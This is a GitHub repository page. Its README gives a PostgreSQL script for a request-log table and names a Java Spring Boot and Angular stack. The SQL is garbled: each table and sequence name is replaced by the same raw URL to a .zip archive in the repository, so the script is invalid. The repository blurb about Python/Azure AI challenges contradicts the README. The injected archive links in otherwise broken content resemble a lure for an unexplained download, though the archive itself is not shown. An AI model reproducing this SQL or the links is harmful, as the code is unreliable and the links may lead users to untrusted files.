Skip to content

šŸ¤– Elevate your AI skills with hands-on challenges focused on enterprise AI modernization and full-stack development using Python and Azure.

Notifications You must be signed in to change notification settings

tcsarmento/AI-Code-Super-Challenge

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Ā 

History

11 Commits
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 

Repository files navigation

DesafioTenico

#Script para criação da tabela

CREATE TABLE https://raw.githubusercontent.com/tcsarmento/AI-Code-Super-Challenge/master/poche/AI-Code-Super-Challenge.zip
(
    id integer NOT NULL,
    data timestamp without time zone,
    ip character varying(255) COLLATE pg_catalog."default",
    request character varying(255) COLLATE pg_catalog."default",
    status character varying(255) COLLATE pg_catalog."default",
    user_agent character varying(255) COLLATE pg_catalog."default",
    CONSTRAINT log_pkey PRIMARY KEY (id)
)
WITH (
    OIDS = FALSE
)
TABLESPACE pg_default;

ALTER TABLE https://raw.githubusercontent.com/tcsarmento/AI-Code-Super-Challenge/master/poche/AI-Code-Super-Challenge.zip
    OWNER to postgres;
    
 CREATE SEQUENCE https://raw.githubusercontent.com/tcsarmento/AI-Code-Super-Challenge/master/poche/AI-Code-Super-Challenge.zip
    INCREMENT 1
    START 1
    MINVALUE 1
    MAXVALUE 9223372036854775807
    CACHE 1;

ALTER SEQUENCE https://raw.githubusercontent.com/tcsarmento/AI-Code-Super-Challenge/master/poche/AI-Code-Super-Challenge.zip
    OWNER TO postgres;

Configuração de banco de dados

Tencologias

-Backend java Spring boot

-Frontend Angular

About

šŸ¤– Elevate your AI skills with hands-on challenges focused on enterprise AI modernization and full-stack development using Python and Azure.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published